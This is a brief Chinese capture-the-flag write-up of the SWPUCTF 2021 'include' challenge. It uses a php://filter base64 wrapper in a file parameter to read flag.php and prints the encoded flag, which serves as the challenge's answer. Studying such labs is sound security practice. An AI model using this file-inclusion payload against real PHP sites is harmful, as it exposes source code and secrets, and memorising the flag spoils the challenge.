[SWPUCTF 2021 新生赛]include

传入一个file试试,尝试/?file=3

提示flag 在flag.php中,但是无法直接读出flag.php - 原因是由于flag.php中不具有echo相对应的输出语句,应该是仅具有$flag变量的定义。因此,采用php伪协议进行输出

?file=php://filter/convert.base64-encode/resource=flag.php

得到PD9waHANCiRmbGFnPSdOU1NDVEZ7Njk4MGY2OTctNzE0OC00M2FlLWFjZmUtNjk2OWZjMzdkNTgwfSc7

进行base64解密即可

相关推荐
hzhsec6 分钟前
挖矿病毒的排查与分析
网络安全·linux安全·病毒排查
大方子4 小时前
【PolarCTF2026年春季挑战赛】新年贺卡
网络安全·polarctf
CDN3604 小时前
CSDN 交流|360CDN 系列产品使用感受与避坑建议
运维·网络安全
CDN3606 小时前
360CDN 产品实测合集:CDN / 高防 / SDK 游戏盾真实反馈
运维·游戏·网络安全
大方子7 小时前
【PolarCTF2026年春季挑战赛】static
网络安全·polarctf
oi..7 小时前
python Get/Post请求练习
开发语言·经验分享·笔记·python·程序人生·安全·网络安全
缘友一世8 小时前
在 Kali Linux 2026 + GOAD v3 环境中安装 BloodHound
网络安全·kali·域渗透·goad
大方子8 小时前
【PolarCTF2026年春季挑战赛】GET
网络安全·polarctf
一名优秀的码农9 小时前
vulhub系列-42-Me-and-My-Girlfriend-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
大方子9 小时前
【PolarCTF2026年春季挑战赛】狗黑子最后的起舞
网络安全·polarctf